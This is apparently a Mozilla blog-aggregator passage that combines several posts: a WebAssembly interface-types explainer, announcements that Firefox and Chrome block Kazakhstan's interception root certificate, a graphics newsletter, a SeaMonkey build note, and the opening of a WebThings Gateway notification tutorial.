This works, but there are some pretty obvious use cases where it doesn’t work very well.

For example, sometimes you just want to pass a string through WebAssembly. You want a JavaScript function to pass a string to a WebAssembly function, and then have WebAssembly pass it to another JavaScript function.

Here’s what needs to happen for that to work:

  1. the first JavaScript function passes the string to the JS glue code

  2. the JS glue code turns that string object into numbers and then puts those numbers into linear memory

  3. then passes a number (a pointer to the start of the string) to WebAssembly

  4. the WebAssembly function passes that number over to the JS glue code on the other side

  5. the second JavaScript function pulls all of those numbers out of linear memory and then decodes them back into a string object

  6. which it gives to the second JS function

JS file passing string 'Hello' to JS glue code
JS glue code turning string into numbers and putting that in linear memory
JS glue code telling engine to pass 2 to wasm
Wasm telling engine to pass 2 to JS glue code
JS glue code taking bytes from linear memory and turning them back into a string
JS glue code passing string to JS file

So the JS glue code on one side is just reversing the work it did on the other side. That’s a lot of work to recreate what’s basically the same object.
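To make that round trip concrete, here is a standalone Rust sketch that simulates what the glue code does on each side. The `LinearMemory` type and its method names are stand-ins I made up for illustration, not a real glue-code API; only the two integers cross the "boundary".

```rust
// Standalone simulation of the string round trip described above. The
// `LinearMemory` struct is a stand-in for a wasm module's memory; the
// names are illustrative, not a real API.
struct LinearMemory {
    bytes: Vec<u8>,
}

impl LinearMemory {
    // Glue code on the first side: turn the string into numbers by copying
    // its bytes into linear memory, returning (pointer, length).
    fn write_str(&mut self, s: &str) -> (usize, usize) {
        let offset = self.bytes.len();
        self.bytes.extend_from_slice(s.as_bytes());
        (offset, s.len())
    }

    // Glue code on the second side: pull the bytes back out of linear
    // memory and decode them into a brand-new string object.
    fn read_str(&self, offset: usize, len: usize) -> String {
        String::from_utf8(self.bytes[offset..offset + len].to_vec()).unwrap()
    }
}

fn main() {
    let mut mem = LinearMemory { bytes: Vec::new() };
    let (ptr, len) = mem.write_str("Hello");
    // Only these two numbers pass through the WebAssembly function...
    // ...and the glue code on the other side reverses the work.
    assert_eq!(mem.read_str(ptr, len), "Hello");
}
```

All the work in `write_str` and `read_str` exists only to recreate an object that both JS functions already understood in the first place.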

If the string could just pass straight through WebAssembly without any transformations, that would be way easier.

WebAssembly wouldn’t be able to do anything with this string—it doesn’t understand that type. We wouldn’t be solving that problem.

But it could just pass the string object back and forth between the two JS functions, since they do understand the type.

So this is one of the reasons for the WebAssembly reference types proposal. That proposal adds a new basic WebAssembly type called anyref.

With an anyref, JavaScript just gives WebAssembly a reference object (basically a pointer that doesn’t disclose the memory address). This reference points to the object on the JS heap. Then WebAssembly can pass it to other JS functions, which know exactly how to use it.

JS passing a string to Wasm and the engine turning it into a pointer
Wasm passing the string to a different JS file, and the engine just passes the pointer on
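As a rough sketch of that pass-through in plain Rust (all names here are hypothetical; `AnyRef` is just an opaque handle standing in for the proposal's reference type):

```rust
// Sketch of the anyref idea: the module holds an opaque handle to an object
// on the JS heap and can pass it along, but cannot look inside it. This is
// an illustration, not the actual proposal's API.
pub struct AnyRef(pub usize); // opaque handle; nothing here can dereference it

// The "wasm module": it just forwards the reference to another JS function.
pub fn wasm_pass_through<F: Fn(&AnyRef) -> String>(r: AnyRef, js_callback: F) -> String {
    js_callback(&r) // no copying, no decoding, just hand the reference over
}

fn main() {
    // The "JS side": a heap of objects, addressed by handle.
    let js_heap = vec![String::from("Hello")];
    let second_js_function = |r: &AnyRef| js_heap[r.0].clone();
    assert_eq!(wasm_pass_through(AnyRef(0), second_js_function), "Hello");
}
```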

So that solves one of the most annoying interoperability problems with JavaScript. But that’s not the only interoperability problem to solve in the browser.

There’s another, much larger, set of types in the browser. WebAssembly needs to be able to interoperate with these types if we’re going to have good performance.

WebAssembly talking directly to the browser

JS is only one part of the browser. The browser also has a lot of other functions, called Web APIs, that you can use.

Behind the scenes, these Web API functions are usually written in C++ or Rust. And they have their own way of storing objects in memory.

Web APIs’ parameters and return values can be lots of different types. It would be hard to manually create mappings for each of these types. So to simplify things, there’s a standard way to talk about the structure of these types—Web IDL.

When you’re using these functions, you’re usually using them from JavaScript. This means you are passing in values that use JS types. How does a JS type get converted to a Web IDL type?

Just as there is a mapping from WebAssembly types to JavaScript types, there is a mapping from JavaScript types to Web IDL types.

So it’s like the engine has another reference book, showing how to get from JS to Web IDL. And this mapping is also hardcoded in the engine.

A book that has mappings between the JS types and Web IDL types

For many types, this mapping between JavaScript and Web IDL is pretty straightforward. For example, types like DOMString and JS’s String are compatible and can be mapped directly to each other.

Now, what happens when you’re trying to call a Web API from WebAssembly? Here’s where we get to the problem.

Currently, there is no mapping between WebAssembly types and Web IDL types. This means that, even for simple types like numbers, your call has to go through JavaScript.

Here’s how this works:

  1. WebAssembly passes the value to JS.
  2. In the process, the engine converts this value into a JavaScript type, and puts it in the JS heap in memory
  3. Then, that JS value is passed to the Web API function. In the process, the engine converts the JS value into a Web IDL type, and puts it in a different part of memory, the renderer’s heap.

Wasm passing number to JS
Engine converting the int32 to a Number and putting it in the JS heap
Engine converting the Number to a double, and putting that in the renderer heap

This takes more work than it needs to, and also uses up more memory.

There’s an obvious solution to this—create a mapping from WebAssembly directly to Web IDL. But that’s not as straightforward as it might seem.

For simple Web IDL types like boolean and unsigned long (which is a number), there are clear mappings from WebAssembly to Web IDL.

But for the most part, Web API parameters are more complex types. For example, an API might take a dictionary, which is basically an object with properties, or a sequence, which is like an array.

To have a straightforward mapping between WebAssembly types and Web IDL types, we’d need to add some higher-level types. And we are doing that—with the GC proposal. With that, WebAssembly modules will be able to create GC objects—things like structs and arrays—that could be mapped to complicated Web IDL types.

But if the only way to interoperate with Web APIs is through GC objects, that makes life harder for languages like C++ and Rust that wouldn’t use GC objects otherwise. Whenever the code interacts with a Web API, it would have to create a new GC object and copy values from its linear memory into that object.

That’s only slightly better than what we have today with JS glue code.

We don’t want JS glue code to have to build up GC objects—that’s a waste of time and space. And we don’t want the WebAssembly module to do that either, for the same reasons.

We want it to be just as easy for languages that use linear memory (like Rust and C++) to call Web APIs as it is for languages that use the engine’s built-in GC. So we need a way to create a mapping between objects in linear memory and Web IDL types, too.

There’s a problem here, though. Each of these languages represents things in linear memory in different ways. And we can’t just pick one language’s representation. That would make all the other languages less efficient.

someone standing between the names of linear memory languages like C, C++, and Rust, pointing to Rust and saying 'I pick... that one!'. A red arrow points to the person saying 'bad idea'

But even though the exact layout in memory for these things is often different, there are some abstract concepts that they usually share in common.

For example, for strings the language often has a pointer to the start of the string in memory, and the length of the string. And even if the string has a more complicated internal representation, it usually needs to convert strings into this format when calling external APIs anyways.

This means we can reduce this string down to a type that WebAssembly understands… two i32s.

The string Hello in linear memory, with an offset of 2 and length of 5. Red arrows point to offset and length and say 'types that WebAssembly understands!'
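In Rust, for example, a string slice is already described by exactly these two values, so extracting them takes no conversion at all. A minimal sketch (the pointer value itself will differ from run to run):

```rust
// A Rust &str is already a pointer plus a length: exactly the two integers
// that WebAssembly understands.
fn as_ptr_len(s: &str) -> (usize, usize) {
    (s.as_ptr() as usize, s.len())
}

fn main() {
    let (ptr, len) = as_ptr_len("Hello");
    println!("offset = {ptr:#x}, length = {len}"); // length is 5
    assert_eq!(len, 5);
}
```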

We could hardcode a mapping like this in the engine. So the engine would have yet another reference book, this time for WebAssembly to Web IDL mappings.

But there’s a problem here. WebAssembly is a type-checked language. To keep things secure, the engine has to check that the calling code passes in types that match what the callee asks for.

This is because there are ways for attackers to exploit type mismatches and make the engine do things it’s not supposed to do.

If you’re calling something that takes a string, but you try to pass the function an integer, the engine will yell at you. And it should yell at you.

So we need a way for the module to explicitly tell the engine something like: “I know Document.createElement() takes a string. But when I call it, I’m going to pass you two integers. Use these to create a DOMString from data in my linear memory. Use the first integer as the starting address of the string and the second as the length.”

This is what the Web IDL proposal does. It gives a WebAssembly module a way to map between the types that it uses and Web IDL’s types.

These mappings aren’t hardcoded in the engine. Instead, a module comes with its own little booklet of mappings.

Wasm file handing a booklet to the engine and saying `Here's a little guidebook. It will tell you how to translate my types to interface types`

So this gives the engine a way to say “For this function, do the type checking as if these two integers are a string.”

The fact that this booklet comes with the module is useful for another reason, though.

Sometimes a module that would usually store its strings in linear memory will want to use an anyref or a GC type in a particular case… for example, if the module is just passing an object that it got from a JS function, like a DOM node, to a Web API.

So modules need to be able to choose on a function-by-function (or even argument-by-argument) basis how different types should be handled. And since the mapping is provided by the module, it can be custom-tailored for that module.

Wasm telling engine 'Read carefully... For some function that take DOMStrings, I'll give you two numbers. For others, I'll just give you the DOMString that JS gave to me.'

How do you generate this booklet?

The compiler takes care of this information for you. It adds a custom section to the WebAssembly module. So for many language toolchains, the programmer doesn’t have to do much work.

For example, let’s look at how the Rust toolchain handles this for one of the simplest cases: passing a string into the alert function.

#[wasm_bindgen]
extern "C" {
    fn alert(s: &str);
}

The programmer just has to tell the compiler to include this function in the booklet using the annotation #[wasm_bindgen]. By default, the compiler will treat this as a linear memory string and add the right mapping for us. If we needed it to be handled differently (for example, as an anyref) we’d have to tell the compiler using a second annotation.

So with that, we can cut out the JS in the middle. That makes passing values between WebAssembly and Web APIs faster. Plus, it means we don’t need to ship down as much JS.

And we didn’t have to make any compromises on what kinds of languages we support. It’s possible to have all different kinds of languages that compile to WebAssembly. And these languages can all map their types to Web IDL types—whether the language uses linear memory, or GC objects, or both.

Once we stepped back and looked at this solution, we realized it solved a much bigger problem.

WebAssembly talking to All The Things

Here’s where we get back to the promise in the intro.

Is there a feasible way for WebAssembly to talk to all of these different things, using all these different type systems?

A wasm file with arrows pointing to and from: logos for different runtimes (Ruby, php, and Python), other wasm files compiled from Rust and Go, and host systems like the OS or browser

Let’s look at the options.

You could try to create mappings that are hardcoded in the engine, like WebAssembly to JS and JS to Web IDL are.

But to do that, for each language you’d have to create a specific mapping. And the engine would have to explicitly support each of these mappings, and update them as the language on either side changes. This creates a real mess.

This is kind of how early compilers were designed. There was a pipeline for each source language to each machine code language. I talked about this more in my first posts on WebAssembly.

We don’t want something this complicated. We want it to be possible for all these different languages and platforms to talk to each other. But we need it to be scalable, too.

So we need a different way to do this… more like modern day compiler architectures. These have a split between front-end and back-end. The front-end goes from the source language to an abstract intermediate representation (IR). The back-end goes from that IR to the target machine code.

This is where the insight from Web IDL comes in. When you squint at it, Web IDL kind of looks like an IR.

Now, Web IDL is pretty specific to the Web. And there are lots of use cases for WebAssembly outside the web. So Web IDL itself isn’t a great IR to use.

But what if you just use Web IDL as inspiration and create a new set of abstract types?

This is how we got to the WebAssembly interface types proposal.

Diagram showing WebAssembly interface types in the middle. On the left is a wasm module, which could be compiled from Rust, Go, C, etc. Arrows point from these options to the types in the middle. On the right are host languages like JS, Python, and Ruby; host platforms like .NET, Node, and operating systems, and more wasm modules. Arrows point from these options to the types in the middle.

These types aren’t concrete types. They aren’t like the int32 or float64 types in WebAssembly today. There are no operations on them in WebAssembly.

For example, there won’t be any string concatenation operations added to WebAssembly. Instead, all operations are performed on the concrete types on either end.

There’s one key point that makes this possible: with interface types, the two sides aren’t trying to share a representation. Instead, the default is to copy values between one side and the other.

saying 'since this is a string in linear memory, I know how to manipulate it' and browser saying 'since this is a DOMString, I know how to manipulate it'

There is one case that would seem like an exception to this rule: the new reference values (like anyref) that I mentioned before. In this case, what is copied between the two sides is the pointer to the object. So both pointers point to the same thing. In theory, this could mean they need to share a representation.

In cases where the reference is just passing through the WebAssembly module (like the anyref example I gave above), the two sides still don’t need to share a representation. The module isn’t expected to understand that type anyway… just pass it along to other functions.

But there are times where the two sides will want to share a representation. For example, the GC proposal adds a way to create type definitions so that the two sides can share representations. In these cases, the choice of how much of the representation to share is up to the developers designing the APIs.

This makes it a lot easier for a single module to talk to many different languages.

In some cases, like the browser, the mapping from the interface types to the host’s concrete types will be baked into the engine.

So one set of mappings is baked in at compile time and the other is handed to the engine at load time.

Engine holding Wasm's mapping booklet and its own mapping reference book for Wasm Interface Types to Web IDL, saying 'So this maps to a string? Ok, I can take it from here to the DOMString that the function is asking for using my hardcoded bindings'

But in other cases, like when two WebAssembly modules are talking to each other, they both send down their own little booklet. They each map their functions’ types to the abstract types.

Engine reaching for mapping booklets from two wasm files, saying 'Ok, let's see how these map to each other'

This isn’t the only thing you need to enable modules written in different source languages to talk to each other (and we’ll write more about this in the future) but it is a big step in that direction.

So now that you understand why, let’s look at how.

What do these interface types actually look like?

Before we look at the details, I should say again: this proposal is still under development. So the final proposal may look very different.

Two construction workers with a sign that says 'Use caution'

Also, this is all handled by the compiler. So even when the proposal is finalized, you’ll only need to know what annotations your toolchain expects you to put in your code (like in the wasm-bindgen example above). You won’t really need to know how this all works under the covers.

But the details of the proposal are pretty neat, so let’s dig into the current thinking.

The problem to solve

The problem we need to solve is translating values between different types when a module is talking to another module (or directly to a host, like the browser).

There are four places where we may need to do a translation:

For exported functions

  • accepting parameters from the caller
  • returning values to the caller

For imported functions

  • passing parameters to the function
  • accepting return values from the function

And you can think about each of these as going in one of two directions:

  • Lifting, for values leaving the module. These go from a concrete type to an interface type.
  • Lowering, for values coming into the module. These go from an interface type to a concrete type.

Telling the engine how to transform between concrete types and interface types

So we need a way to tell the engine which transformations to apply to a function’s parameters and return values. How do we do this?

By defining an interface adapter.

For example, let’s say we have a Rust module compiled to WebAssembly. It exports a greeting_ function that can be called without any parameters and returns a greeting.

Here’s what it would look like (in WebAssembly text format) today.

a Wasm module that exports a function that returns two numbers. See proposal linked above for details.

So right now, this function returns two integers.

But we want it to return the string interface type. So we add something called an interface adapter.

If an engine understands interface types, then when it sees this interface adapter, it will wrap the original module with this interface.

an interface adapter that returns a string. See proposal linked above for details.

It won’t export the greeting_ function anymore… just the greeting function that wraps the original. This new greeting function returns a string, not two numbers.

This provides backwards compatibility because engines that don’t understand interface types will just export the original greeting_ function (the one that returns two integers).

How does the interface adapter tell the engine to turn the two integers into a string?

It uses a sequence of adapter instructions.

Two adapter instructions inside of the adapter function. See proposal linked above for details.

The adapter instructions above are two from a small set of new instructions that the proposal specifies.

Here’s what the instructions above do:

  1. Use the call-export adapter instruction to call the original greeting_ function. This is the one that the original module exported, which returned two numbers. These numbers get put on the stack.
  2. Use the memory-to-string adapter instruction to convert the numbers into the sequence of bytes that make up the string. We have to specify “mem” here because a WebAssembly module could one day have multiple memories. This tells the engine which memory to look in. Then the engine takes the two integers from the top of the stack (which are the pointer and the length) and uses those to figure out which bytes to use.

This might look like a full-fledged programming language. But there is no control flow here—you don’t have loops or branches. So it’s still declarative even though we’re giving the engine instructions.

What would it look like if our function also took a string as a parameter (for example, the name of the person to greet)?

Very similar. We just change the interface of the adapter function to add the parameter. Then we add two new adapter instructions.

Here’s what these new instructions do:

  1. Use the arg.get instruction to take a reference to the string object and put it on the stack.
  2. Use the string-to-memory instruction to take the bytes from that object and put them in linear memory. Once again, we have to tell it which memory to put the bytes into. We also have to tell it how to allocate the bytes. We do this by giving it an allocator function (which would be an export provided by the original module).

One nice thing about using instructions like this: we can extend them in the future… just as we can extend the instructions in WebAssembly core. We think the instructions we’re defining are a good set, but we aren’t committing to these being the only instructions for all time.

If you’re interested in understanding more about how this all works, the explainer goes into much more detail.

Sending these instructions to the engine

Now how do we send this to the engine?

These annotations get added to the binary file in a custom section.

A file split in two. The top part is labeled 'known sections, e.g. code, data'. The bottom part is labeled 'custom sections, e.g. interface adapter'

If an engine knows about interface types, it can use the custom section. If not, the engine can just ignore it, and you can use a polyfill which will read the custom section and create glue code.

How is this different than CORBA, Protocol Buffers, etc?

There are other standards that seem like they solve the same problem—for example CORBA, Protocol Buffers, and Cap’n Proto.

How are those different? They are solving a much harder problem.

They are all designed so that you can interact with a system that you don’t share memory with—either because it’s running in a different process or because it’s on a totally different machine across the network.

This means that you have to be able to send the thing in the middle—the “intermediate representation” of the objects—across that boundary.

So these standards need to define a serialization format that can efficiently go across the boundary. That’s a big part of what they are standardizing.

Two computers with wasm files on them and multiple lines flowing into a single line connecting them. The single line represents serialization and is labelled 'IR'

Even though this looks like a similar problem, it’s actually almost the exact inverse.

With interface types, this “IR” never needs to leave the engine. It’s not even visible to the modules themselves.

The modules only see what the engine spits out for them at the end of the process—what’s been copied to their linear memory or given to them as a reference. So we don’t have to tell the engine what layout to give these types—that doesn’t need to be specified.

What is specified is the way that you talk to the engine. It’s the declarative language for this booklet that you’re sending to the engine.

Two wasm files with arrows pointing to the word 'IR' with no line between, because there is no serialization happening.

This has a nice side effect: because this is all declarative, the engine can see when a translation is unnecessary—like when the two modules on either side are using the same type—and skip the translation work altogether.

The engine looking at the booklets for a Rust module and a Go module and saying 'Ooh, you’re both using linear memory for this string... I’ll just do a quick copy between your memories, then'
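A sketch of that shortcut, assuming both modules represent strings as bytes at an (offset, length) pair in their own linear memory (the names are illustrative, not engine internals):

```rust
// When both sides declare "string = bytes at (offset, length) in my memory",
// the engine can skip the intermediate value entirely and do a single copy
// from one module's memory into the other's.
pub fn copy_string(src: &[u8], src_off: usize, len: usize,
                   dst: &mut [u8], dst_off: usize) {
    dst[dst_off..dst_off + len].copy_from_slice(&src[src_off..src_off + len]);
}

fn main() {
    let rust_module_memory = b"Hello".to_vec(); // source module's memory
    let mut go_module_memory = vec![0u8; 16];   // destination module's memory
    copy_string(&rust_module_memory, 0, 5, &mut go_module_memory, 3);
    assert_eq!(&go_module_memory[3..8], b"Hello");
}
```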

How can you play with this today?

As I mentioned above, this is an early stage proposal. That means things will be changing rapidly, and you don’t want to depend on this in production.

But if you want to start playing with it, we’ve implemented this across the toolchain, from production to consumption:

  • the Rust toolchain
  • wasm-bindgen
  • the Wasmtime WebAssembly runtime

And since we maintain all these tools, and since we’re working on the standard itself, we can keep up with the standard as it develops.

Even though all these parts will continue changing, we’re making sure to synchronize our changes to them. So as long as you use up-to-date versions of all of these, things shouldn’t break too much.

Construction worker saying 'Just be careful and stay on the path'

So here are the many ways you can play with this today. For the most up-to-date version, check out this repo of demos.

Thank you

  • Thank you to the team who brought all of the pieces together across all of these languages and runtimes: Alex Crichton, Yury Delendik, Nick Fitzgerald, Dan Gohman, and Till Schneidereit
  • Thank you to the proposal co-champions and their colleagues for their work on the proposal: Luke Wagner, Francis McCabe, Jacob Gravelle, Alex Crichton, and Nick Fitzgerald
  • Thank you to my fantastic collaborators, Luke Wagner and Till Schneidereit, for their invaluable input and feedback on this article

The post WebAssembly Interface Types: Interoperate with All the Things! appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogMozilla takes action to protect users in Kazakhstan

Today, Mozilla and Google took action to protect the online security and privacy of individuals in Kazakhstan. Together the companies deployed technical solutions within Firefox and Chrome to block the Kazakhstan government’s ability to intercept internet traffic within the country.

The response comes after credible reports that internet service providers in Kazakhstan have required people in the country to download and install a government-issued certificate on all devices and in every browser in order to access the internet. This certificate is not trusted by either of the companies, and once installed, allowed the government to decrypt and read anything a user types or posts, including intercepting their account information and passwords. This targeted people visiting popular sites such as Facebook, Twitter and Google, among others.

“People around the world trust Firefox to protect them as they navigate the internet, especially when it comes to keeping them safe from attacks like this that undermine their security. We don’t take actions like this lightly, but protecting our users and the integrity of the web is the reason Firefox exists.” — Marshall Erwin, Senior Director of Trust and Security, Mozilla

“We will never tolerate any attempt, by any organization—government or otherwise—to compromise Chrome users’ data. We have implemented protections from this specific issue, and will always take action to secure our users around the world.” — Parisa Tabriz, Senior Engineering Director, Chrome

This is not the first attempt by the Kazakhstan government to intercept the internet traffic of everyone in the country. In 2015, the Kazakhstan government attempted to have a root certificate included in Mozilla’s trusted root store program. After it was discovered that they were intending to use the certificate to intercept user data, Mozilla denied the request. Shortly after, the government forced citizens to manually install its certificate but that attempt failed after organizations took legal action.

Each company will deploy a technical solution unique to its browser. For additional information on those solutions, please see the links below.


Russian: If you would like to read this text in Russian, click here.

Kazakh: Read this post in Kazakh here.





The post Mozilla takes action to protect users in Kazakhstan appeared first on The Mozilla Blog.

Web Application SecurityProtecting our Users in Kazakhstan

Russian translation: If you would like to read this text in Russian, click here.

Kazakh translation: Read this post in Kazakh here.

In July, a Firefox user informed Mozilla of a security issue impacting Firefox users in Kazakhstan: they stated that Internet Service Providers (ISPs) in Kazakhstan had begun telling their customers that they must install a government-issued root certificate on their devices. What the ISPs didn’t tell their customers was that the certificate was being used to intercept network communications. Other users and researchers confirmed these claims, and listed three dozen popular social media and communications sites that were affected.

The security and privacy of HTTPS encrypted communications in Firefox and other browsers relies on trusted Certificate Authorities (CAs) to issue website certificates only to someone that controls the domain name or website. For example, you and I can’t obtain a trusted certificate for www.facebook.com because Mozilla has strict policies for all CAs trusted by Firefox which only allow an authorized person to get a certificate for that domain. However, when a user in Kazakhstan installs the root certificate provided by their ISP, they are choosing to trust a CA that doesn’t have to follow any rules and can issue a certificate for any website to anyone. This enables the interception and decryption of network communications between Firefox and the website, sometimes referred to as a Monster-in-the-Middle (MITM) attack.

We believe this act undermines the security of our users and the web, and it directly contradicts Principle 4 of the Mozilla Manifesto that states, “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.”

To protect our users, Firefox, together with Chrome, will block the use of the Kazakhstan root CA certificate. This means that it will not be trusted by Firefox even if the user has installed it. We believe this is the appropriate response because users in Kazakhstan are not being given a meaningful choice over whether to install the certificate and because this attack undermines the integrity of a critical network security mechanism.  When attempting to access a website that responds with this certificate, Firefox users will see an error message stating that the certificate should not be trusted.

We encourage users in Kazakhstan affected by this change to research the use of virtual private network (VPN) software, or the Tor Browser, to access the Web. We also strongly encourage anyone who followed the steps to install the Kazakhstan government root certificate to remove it from your devices and to immediately change your passwords, using a strong, unique password for each of your online accounts.

The post Protecting our Users in Kazakhstan appeared first on Mozilla Security Blog.

Mozilla Gfx Teammoz://gfx newsletter #47

Hi there! Time for another mozilla graphics newsletter. In the comments section of the previous newsletter, Michael asked about the relation between WebRender and WebGL; I’ll try to give a short answer here.

Both WebRender and WebGL need access to the GPU to do their work. At the moment both of them use the OpenGL API, either directly or through ANGLE, which emulates OpenGL on top of D3D11. They, however, each work with their own OpenGL context. Frames produced with WebGL are sent to WebRender as texture handles. WebRender, at the API level, has a single entry point for images, video frames, canvases—in short, for every grid of pixels in some flavor of RGB format, be they CPU-side buffers or already in GPU memory, as is normally the case for WebGL. In order to share textures between separate OpenGL contexts we rely on platform-specific APIs such as EGLImage and DXGI.

Beyond that there isn’t any fancy interaction between WebGL and WebRender. The latter sees the former as an image producer, just like 2D canvases, video decoders and plain static images.

What’s new in gfx

Wayland and hidpi improvements on Linux

  • Martin Stransky made a proof of concept implementation of DMABuf textures in Gecko’s IPC mechanism. This dmabuf EGL texture backend on Wayland is similar to what we have on Android/Mac. Dmabuf buffers can be shared with the main/compositor process, can be bound as a render target or texture, and can reside in GPU memory. The same dmabuf buffer can also be used as a hardware overlay when it’s attached to a wl_surface/wl_subsurface as a wl_buffer.
  • Jan Horak fixed a bug that prevented tabs from rendering after restoring a minimized window.
  • Jan Horak fixed the window parenting hierarchy with Wayland.
  • Jan Horak fixed a bug with hidpi that was causing select popups to render incorrectly after scrolling.

WebGL multiview rendering

WebGL’s multiview rendering extension has been approved by the working group and its implementation by Jeff Gilbert will be shipping in Firefox 70.
This extension allows more efficient rendering into multiple viewports, which is most commonly used by VR/AR for rendering both eyes at the same time.

Better high dynamic range support

Jean Yves landed the first part of his HDR work (a set of 14 patches). While we can’t yet output HDR content to HDR screen, this work greatly improved the correctness of the conversion from various HDR formats to low dynamic range sRGB.

You can follow progress on the color space meta bug.

What’s new in WebRender

WebRender is a GPU-based 2D rendering engine for the web, written in Rust, currently powering Firefox’s rendering as well as the research web browser Servo.

If you are curious about the state of WebRender on a particular platform, up to date information is available at http://arewewebrenderyet.com

Speaking of which, darkspirit enabled WebRender for Linux users with Nvidia+Nouveau drivers in Firefox Nightly.

More filters in WebRender

When we run into a primitive that isn’t supported by WebRender, we make it go through a software fallback implementation, which can be slow for some things. SVG filters are a good example of primitives that perform much better when implemented on the GPU in WebRender.
Connor Brewster has been working on implementing a number of SVG filters in WebRender:

See the SVG filters in WebRender meta bug.

Texture swizzling and allocation

WebRender previously only worked with BGRA for color textures. Unfortunately, this format is optimal on some platforms but sub-optimal (or even unsupported) on others, so a conversion sometimes has to happen, and this conversion, if done by the driver, can be very costly.

Kvark reworked the texture caching logic to support using and swizzling between different formats (for example RGBA and BGRA).
A document that landed with the implementation provides more details about the approach and context.
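In WebRender the swizzle is applied by the GPU when the texture is sampled rather than by copying on the CPU, but conceptually the channel reordering amounts to something like this sketch (illustrative only, not WebRender’s actual code):

```javascript
// Illustrative BGRA -> RGBA swizzle over a flat pixel buffer.
// WebRender itself asks the GPU to reorder channels at sampling time.
function bgraToRgba(src) {
  const dst = new Uint8Array(src.length);
  for (let i = 0; i < src.length; i += 4) {
    dst[i]     = src[i + 2]; // R comes from the B slot
    dst[i + 1] = src[i + 1]; // G stays in place
    dst[i + 2] = src[i];     // B comes from the R slot
    dst[i + 3] = src[i + 3]; // A stays in place
  }
  return dst;
}
```

Doing this reordering at sampling time avoids exactly the kind of costly driver-side conversion described above.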

Kvark also improved the texture cache allocation behavior.

Kvark also landed various refactorings (1), (2), (3), (4).

Android improvements

Jamie fixed emoji rendering with WebRender on Android and continues investigating driver issues on Adreno 3xx devices.

Displaylist serialization

Dan replaced bincode in our DL IPC code with a new bespoke and private serialization library (peek-poke), ending the terrible reign of the secret serde deserialize_in_place hacks and our fork of serde_derive.

Picture caching improvements

Glenn landed several improvements and fixes to the picture caching infrastructure:

  • Bug 1566712 – Fix quality issues with picture caching when transform has fractional offsets.
  • Bug 1572197 – Fix world clip region for preserve-3d items with picture caching.
  • Bug 1566901 – Make picture caching more robust to float issues.
  • Bug 1567472 – Fix bug in preserve-3d batching code in WebRender.

Font rendering improvements

Lee landed quite a few font related patches:

  • Bug 1569950 – Only partially clear WR glyph caches if it is not necessary to fully clear.
  • Bug 1569174 – Disable embedded bitmaps if ClearType rendering mode is forced.
  • Bug 1568841 – Force GDI parameters for GDI render mode.
  • Bug 1568858 – Always stretch box shadows except for Cairo.
  • Bug 1568841 – Don’t use enhanced contrast on GDI fonts.
  • Bug 1553818 – Use GDI ClearType contrast for GDI font gamma.
  • Bug 1565158 – Allow forcing DWrite symmetric rendering mode.
  • Bug 1563133 – Limit the GlyphBuffer capacity.
  • Bug 1560520 – Limit the size of WebRender’s glyph cache.
  • Bug 1566449 – Don’t reverse glyphs in GlyphBuffer for RTL.
  • Bug 1566528 – Clamp the amount of synthetic bold extra strikes.
  • Bug 1553228 – Don’t free the result of FcPatternGetString.

Various fixes and improvements

  • Gankra fixed an issue with addon popups and document splitting.
  • Sotaro prevented some unnecessary composites on out-of-viewport external image updates.
  • Nical fixed an integer overflow causing the browser to freeze.
  • Nical improved the overlay profiler by showing more relevant numbers when the timings are noisy.
  • Nical fixed corrupted rendering of progressively loaded images.
  • Nical added a fast path when none of the primitives of an image batch need anti-aliasing or repetition.

SeaMonkeyBuild3 has been “candidatized”…

Hi everyone!

Build 3 has been pushed to the regular candidates path.  I’ve coined a ‘new’ term “candidatized”, meaning it’s been sent to the candidates path on archive.mo.

That said, there’s a chance it’ll be dubbed 2.49.5 instead of rc3.

Also, that said, there are a few changes from the previous automation-based releases/candidates: a lot of the files that are supposed to be there aren’t, and some files that shouldn’t be there are. The automation is still not working; the “automation” that’s in place is manual…  😛

Yes, we’re missing a README file.   No fear…  that’s coming next.  So if you refresh that main build3/ page, it should appear within 24 hrs provided it’s there.  [motif being “it’s there when it’s there.”]

Again, I cannot stress this enough. Both IanN and frg were the mainstays of this release. So all-round applause to them!


hacks.mozilla.orgUsing WebThings Gateway notifications as a warning system for your home

Ever wonder if that leaky pipe you fixed is holding up? With a trip to the hardware store and a Mozilla WebThings Gateway you can set up a cheap leak sensor to keep an eye on the situation, whether you’re home or away. Although you can look up detector status easily on the web-based dashboard, it would be better to not need to pay attention unless a leak actually occurs. In the WebThings Gateway 0.9 release, a number of different notification mechanisms can be set up, including emails, apps, and text messages.

Leak Sensor Demo


In this post I’ll show you how to set up gateway notifications to warn you of changes in your home that you care about. You can set each notification to one of three levels of severity–low, normal, and high–so that you can identify which are informational changes and which alerts should be addressed immediately (fire! intruder! leak!). First, we’ll choose a device to worry about. Next, we’ll decide how we want our gateway to contact us. Finally, we’ll set up a rule to tell the gateway when it should contact us.

Choosing a device

First, make sure the device you want to monitor is connected to your gateway. If you haven’t added the device yet, visit the Gateway User Guide for information about getting started.

Now it’s time to figure out which things’ properties will lead to interesting notifications. For each thing you want to investigate, click on its splat icon to get a full view of all its properties.

View of all gateway things with splat icon of leak sensor highlighted Detailed Leak Sensor view

You may also want to log properties of various analog devices over time to see what values are “normal”. For example, you can monitor the refrigerator temperature for a couple of days to help determine what qualifies as an abnormal temperature. In this graph, you can see the difference between baseline power draw (around 20 watts) and charging (up to 90 watts).

Graph of laptop charger plug power over the last day with clear differentiation between off, standby, and charging states

Charger Power Consumption Graph

In my case, I’ve selected a leak sensor so I won’t need to log data in advance. It’s pretty clear that I want to be notified when the leak property of my sensor becomes true (i.e., when a leak is detected). If instead you want to monitor a smart plug, you can look at voltage, power, or on/off state. Note that the notification rules you create will let you combine multiple inputs using “and” or “or” logic. For example, you might want to be alerted if indoor motion is detected “and” all of the family smartphone “presence” states are “inactive” (i.e., no one in your family is home, so what caused motion?). Whatever your choice, keep the logical states of your various sensors in mind while you set up your notifier.
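The “and” rule described above boils down to simple boolean logic. As a hypothetical sketch (the real gateway composes this from drag-and-drop blocks, and the names here are illustrative):

```javascript
// Hypothetical sketch of the "indoor motion AND nobody home" rule above;
// the real gateway builds this with drag-and-drop blocks, not code.
function shouldNotify(indoorMotion, phonePresence) {
  // Alert only when motion is detected and every family phone is "inactive".
  return indoorMotion && phonePresence.every(state => state === 'inactive');
}
```

Keeping the logical states straight in this form makes it easier to reason about when the drag-and-drop rule will actually fire.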

Setting up your notifier

